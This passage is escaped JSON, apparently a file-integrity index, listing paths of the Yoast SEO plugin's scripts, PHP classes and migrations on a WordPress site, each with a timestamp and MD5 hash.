da7e5013b931d8c91289f2c28\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/mk.js\":{\"d\":1545638239,\"h\":\"6d008efda78753f02d495ec6085b36a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/select2.full.min.js\":{\"d\":1545638235,\"h\":\"cd78b47f8f1999fb4d258515099231d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-admin-gsc-930.min.js\":{\"d\":1545638235,\"h\":\"6981b8028dcdd1da51d86ec4a8b1f879\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-modal-930.min.js\":{\"d\":1545638235,\"h\":\"2ca3cf5c2127c204333591b6172614f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-network-admin-930.min.js\":{\"d\":1545638235,\"h\":\"9ba29397224462221db44cea05181614\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-admin-global-930.min.js\":{\"d\":1545638235,\"h\":\"0e7b2f6deaed16ebe72cef1795d95ed4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/styled-components-930.min.js\":{\"d\":1545638235,\"h\":\"86a4bb14a7aa188ed733fef4b5b998dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-used-keywords-assessment-930.min.js\":{\"d\":1545638235,\"h\":\"90dba02f95d472ac7e4cc506a830b42f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-edit-page-930.min.js\":{\"d\":1545638235,\"h\":\"50026e84ccb479f9c242cccf5f893e4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/babel-polyfill-930.min.js\":{\"d\":1545638235,\"h\":\"d00021ff8b67e3b836ca33a86b00a78f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-i18n-930.min.js\":{\"d\":1545638235,\"h\":\"77ae39a160d319be83594ce9cf47dbf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/commons-930.min.js\":{\"d\":1545638235,\"h\":\"2a3d69997d17a91e1ce12da4d72d933b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-richText-930.min.js\":{\"d\":1545638235,\"h\":\"f185012a182c6ad8870a3fdb8c93c3cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-shortcode-plugin-930.min.js\":{\"d\":1545638235,\"h\":\"72e03fddcd4018ae11c5d1153fdafcac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/analysis-930.min.js\":{\"d\":1545638235,\"h\":\"07bece539ef3843e84bb353569a61046\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-apiFetch-930.min.js\":{\"d\":1545638235,\"h\":\"e8b127a9393ba876b690b47846195586\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/configuration-wizard-930.min.js\":{\"d\":1545638235,\"h\":\"60e0d283c55a26b94e7f32fadc42b811\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-admin-media-930.min.js\":{\"d\":1545638239,\"h\":\"4512a765209ad39dbe466048008e23cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/search-appearance-930.min.js\":{\"d\":1545638239,\"h\":\"e90e7331296784bd0f382598645755e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-help-center-930.min.js\":{\"d\":1545638239,\"h\":\"72d4af832ec79243be8edb22819c0f38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-data-930.min.js\":{\"d\":1545638239,\"h\":\"70d24c572239966f1fd2e72c2579bb06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-quick-edit-handler-930.min.js\":{\"d\":1545638239,\"h\":\"752030af4e6c94805529d5b0b2a97233\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-structured-data-blocks-930.min.js\":{\"d\":1545638239,\"h\":\"0ac5f9c30e6fd464b29d5a6b04658b7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-admin-930.min.js\":{\"d\":1545638239,\"h\":\"8de2632ca28c75a87f7aa10113440b24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-compose-930.min.js\":{\"d\":1545638239,\"h\":\"6d6d9620423752ac7a7727e503f6db68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-metabox-category-930.min.js\":{\"d\":1545638239,\"h\":\"5e962a9a8b6f87ce61a28acd3f248798\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-featured-image-930.min.js\":{\"d\":1545638239,\"h\":\"69cb08bdda0395faca17e1a7b9bfff60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/components-930.min.js\":{\"d\":1545638239,\"h\":\"ba5226c74a856106e66eb8f329e941fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-element-930.min.js\":{\"d\":1545638239,\"h\":\"99a9da32d6b7d56099c0b680ec93cee4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-reindex-links-930.min.js\":{\"d\":1545638239,\"h\":\"4a37140e0c53e3f053da75ec71ad7d57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-filter-explanation-930.min.js\":{\"d\":1545638239,\"h\":\"891450df5372d695f87becc241455395\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-components-930.min.js\":{\"d\":1545638239,\"h\":\"36029db969226495ebe0fa9e5fe409c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-bulk-editor-930.min.js\":{\"d\":1545638239,\"h\":\"da369b9b65951dec9d167702646518d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-dashboard-widget-930.min.js\":{\"d\":1545638239,\"h\":\"cc8abb2c9a1c6c5dc332beb6eb6999ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-api-930.min.js\":{\"d\":1545638239,\"h\":\"e3a64830fd108cc360ac55cf51446548\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-analysis-worker-930.min.js\":{\"d\":1545638243,\"h\":\"e5ac6f614aa43922a1ff6d9197dfb9c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-post-scraper-930.min.js\":{\"d\":1545638243,\"h\":\"c5efebbbd33e284abd9eb9187e20d438\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-replacevar-plugin-930.min.js\":{\"d\":1545638243,\"h\":\"6866c81ddb3324193cff7be425951027\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-term-scraper-930.min.js\":{\"d\":1545638243,\"h\":\"b9ab4cffde01006dae61d30f3b4852c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-recalculate-930.min.js\":{\"d\":1545638243,\"h\":\"21e13638226832cf51c92c46262d53d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/wp-seo-metabox-930.min.js\":{\"d\":1545638243,\"h\":\"84fc8f64dba5d90bbfd28500d03d1055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/migrations\\/20171228151841_WpYoastPrimaryTerm.php\":{\"d\":1545638243,\"h\":\"6f3ed21bc304aa3078e98693522c59b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/migrations\\/20171228151840_WpYoastIndexable.php\":{\"d\":1545638243,\"h\":\"8185072677709258894e8e039b3941d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/migrations\\/20180515101200_WpYoastIndexableMeta.php\":{\"d\":1545638243,\"h\":\"3dbcddb6f0e49473ed75636af323264f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-wpseo-advanced-settings.php\":{\"d\":1545638243,\"h\":\"bc9bf3c10f5ddcf4e3ad17d0f73ca12b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-submenu-hider.php\":{\"d\":1545638243,\"h\":\"ff5dc4a9e6d34ab7fdd69b5837d69141\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/index.php\":{\"d\":1545638243,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-yoast-modal.php\":{\"d\":1545638243,\"h\":\"b49ddd3745073b74a43fc2819de92bd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-wpseo-option-internallinks.php\":{\"d\":1545638243,\"h\":\"021ba65b9e6c1490212f421b8d0a39f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-wpseo-option-permalinks.php\":{\"d\":1545638243,\"h\":\"199075e83604e5f11671708c1871df30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/deprecated\\/class-cornerstone.php\":{\"d\":1545638243,\"h\":\"c5499e71a4b8f82d0ea43659e63f4866\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/structured-data-blocks\\/class-faq-block.php\":{\"d\":1545638243,\"h\":\"3005b5ac484780f5b18cb02c8d3f7354\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/structured-data-blocks\\/class-how-to-block.php\":{\"d\":1545638243,\"h\":\"4d86889e607a3d9b1e16b869386f5ea9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-object-type-validator.php\":{\"d\":1545638243,\"h\":\"4f3165e98fee3f58d854c80f9e1f5881\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-keyword-validator.php\":{\"d\":1545638243,\"h\":\"37998774264e73c150e5ce500fd39bc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-meta-values-validator.php\":{\"d\":1545638243,\"h\":\"5d07029f071ddfa0dc059dc7008d40e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-link-validator.php\":{\"d\":1545638243,\"h\":\"0eed784598cfcb1e01c53a53bcd0c510\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-twitter-validator.php\":{\"d\":1545638243,\"h\":\"7a173764a988f6e487edb86906056b34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-opengraph-validator.php\":{\"d\":1545638243,\"h\":\"a90ae4b4d115295ca2df8e9fedb8e3f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-endpoint-validator.php\":{\"d\":1545638243,\"h\":\"022a1235052771525e76a69e6cc6655b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/validators\\/class-robots-validator.php\":{\"d\":1545638243,\"h\":\"933328751a88ceb2dbe1e55642eeb5d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-object-type.php\":{\"d\":1545638243,\"h\":\"577b8d4de0a444d9b02870f422c1b0c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-term-object-type.php\":{\"d\":1545638243,\"h\":\"2a1e2ebc4916ac39562ec5fb030932b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-post-indexable.php\":{\"d\":1545638243,\"h\":\"c2e22caec475902b812bf1df1ec4225a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-term-indexable.php\":{\"d\":1545638243,\"h\":\"b5f6625928847f200c57c750af21c6f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-post-object-type.php\":{\"d\":1545638243,\"h\":\"cf06221c3f4e2ed9ea3391ee4e15d162\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/indexables\\/class-indexable.php\":{\"d\":1545638243,\"h\":\"32195b49fddb6e55f8ddc2694f17e69f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps-router.php\":{\"d\":1545638243,\"h\":\"4fbc87163ee3f2cba1252667bace1e44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/interface-sitemap-cache-data.php\":{\"d\":1545638243,\"h\":\"21681a77118314d5b4ec2b94c566459d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps-cache-validator.php\":{\"d\":1545638243,\"h\":\"2b031764c080ff0d261ccfeb85488521\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-author-sitemap-provider.php\":{\"d\":1545638243,\"h\":\"5278faad0f9df27ef0fc2e97ff4ebb27\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps.php\":{\"d\":1545638243,\"h\":\"871e4e151d1ac3678508d73e13ad42b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemap-timezone.php\":{\"d\":1545638243,\"h\":\"7f787e0d05f780e7bb2a35ed1dba19ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps-admin.php\":{\"d\":1545638243,\"h\":\"ae552d5b0469aa7909e938a4aa976004\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemap-image-parser.php\":{\"d\":1545638243,\"h\":\"f3b7beaf018e90a66ef21d70ab439627\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-post-type-sitemap-provider.php\":{\"d\":1545638243,\"h\":\"0c82bb22ab5f23428e257830ed510e5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps-renderer.php\":{\"d\":1545638243,\"h\":\"5dbd157bb9603bf49b5b0cb841c40ca3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/interface-sitemap-provider.php\":{\"d\":1545638243,\"h\":\"c604532f09b4230695f1afb357b8c224\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemaps-cache.php\":{\"d\":1545638243,\"h\":\"459668a956caceec054dbb61448229c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-sitemap-cache-data.php\":{\"d\":1545638243,\"h\":\"8bf66463510ec68d0c1e38dbb289c9ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/sitemaps\\/class-taxonomy-sitemap-provider.php\":{\"d\":1545638243,\"h\":\"be14d507059e55046be93b7da45cd836\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-option-ms.php\":{\"d\":1545638243,\"h\":\"9d18379b7e497b2efd9402877d28e8dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-taxonomy-meta.php\":{\"d\":1545638243,\"h\":\"062d2fdcceb29e234de6501c493b1079\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-option-social.php\":{\"d\":1545638243,\"h\":\"5584055fe59ac55eb25d0376ce81bd92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-options-backfill.php\":{\"d\":1545638243,\"h\":\"cd2a84869a1112b41d02bb8e6d7c81c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-option.php\":{\"d\":1545638243,\"h\":\"a8589078f152488363bb8337d7716b3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-options.php\":{\"d\":1545638243,\"h\":\"36982a4230b79f312de78d60de6a2794\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-option-titles.php\":{\"d\":1545638243,\"h\":\"f71add7169888c9b6e7b73efa3120f91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/options\\/class-wpseo-option-wpseo.php\":{\"d\":1545638243,\"h\":\"19ef65f73ca4540272d76b3b595a4918\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/exceptions\\/class-invalid-argument-exception.php\":{\"d\":1545638243,\"h\":\"2b5f74fbd298e57bb83aae0de63db86a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/exceptions\\/class-invalid-indexable-exception.php\":{\"d\":1545638243,\"h\":\"c39305664380fc4303f9f2e11d893dee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/exceptions\\/class-rest-request-exception.php\":{\"d\":1545638243,\"h\":\"1657555139b66daf9896f21be833118f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-features.php\":{\"d\":1545638243,\"h\":\"3cfb1c9089ee6464a1fff33c580ac0db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-validator.php\":{\"d\":1545638243,\"h\":\"9c2bd324dc7952e02d43f697476d80a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-primary-term.php\":{\"d\":1545638243,\"h\":\"4de6ad83095e572b37909847fbabf2eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/wpseo-functions-deprecated.php\":{\"d\":1545638243,\"h\":\"7886161d1303f5c2270ba13b3aae6386\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-meta.php\":{\"d\":1545638243,\"h\":\"365d254240650ae6abdcb741664f5a9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-replace-vars.php\":{\"d\":1545638243,\"h\":\"952ea2b5931d8a5011648a8b970757b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/interface-wpseo-wordpress-integration.php\":{\"d\":1545638243,\"h\":\"8cc3c7804f00a46007c153b9e3690610\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-custom-taxonomies.php\":{\"d\":1545638243,\"h\":\"68f596f13514dc1a05bf1b2827020e3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-statistics.php\":{\"d\":1545638243,\"h\":\"e0f7aa0fc69c9263eba4251fab4ce416\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-shortlinker.php\":{\"d\":1545638243,\"h\":\"030726219b50f582d828c2e5f6566bc4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-installation.php\":{\"d\":1545638243,\"h\":\"ffbf853bee90838baa45238277aacee1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-replacement-variable.php\":{\"d\":1545638243,\"h\":\"bdd2ff6d19613f1444b89c5eac7720f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-admin-bar-menu.php\":{\"d\":1545638243,\"h\":\"b50778cdd7edaac7bf3e2dd51c3b4f88\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/language-utils.php\":{\"d\":1545638243,\"h\":\"810359a63e4f2430bedd8852e2d3f96f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-post-type.php\":{\"d\":1545638243,\"h\":\"a663737f1ff59330bcf596c09e252c43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/index.php\":{\"d\":1545638243,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-custom-fields.php\":{\"d\":1545638243,\"h\":\"8c75791e221ec73578b31e5b27f8ccf9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/interface-wpseo-wordpress-ajax-integration.php\":{\"d\":1545638243,\"h\":\"6450fc58c203a5c51cd7fb6e85e724c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-rank.php\":{\"d\":1545638243,\"h\":\"9e98a68bc7c7c5abf8c51b881bb63504\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-content-images.php\":{\"d\":1545638243,\"h\":\"aaf42e9b21c53b1d9b28916deabb69ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-utils.php\":{\"d\":1545638243,\"h\":\"145032bc507af08317f43375fdd09c2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/wpseo-functions.php\":{\"d\":1545638243,\"h\":\"8f6d80b95e2bf6b176aae0c86f159bca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/wpseo-non-ajax-functions.php\":{\"d\":1545638243,\"h\":\"ea1201bcdb22d093d07dbd8776b752cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-rewrite.php\":{\"d\":1545638243,\"h\":\"745c4ab3b2ec971980c222fd8a10c555\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-endpoint-factory.php\":{\"d\":1545638243,\"h\":\"9b748f623d7a4bd6bb666de4f2727e11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-upgrade.php\":{\"d\":1545638243,\"h\":\"1825fc11ba10fbd14c606aa4a8365724\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-wpseo-image-utils.php\":{\"d\":1545638243,\"h\":\"ffec3dcf7e72069b882924b5700bbc4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/inc\\/class-structured-data-blocks.php\":{\"d\":1545638243,\"h\":\"c89ed2a89aa64880fd41db01fad19263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/images\\/index.php\":{\"d\":1545638243,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/wp-seo-main.php\":{\"d\":1545638228,\"h\":\"dbf2024aeb95559c5b7820de2960cd16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/license.txt\":{\"d\":1545638232,\"h\":\"b6d57e80537d4ce37e23767635ed2b2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpres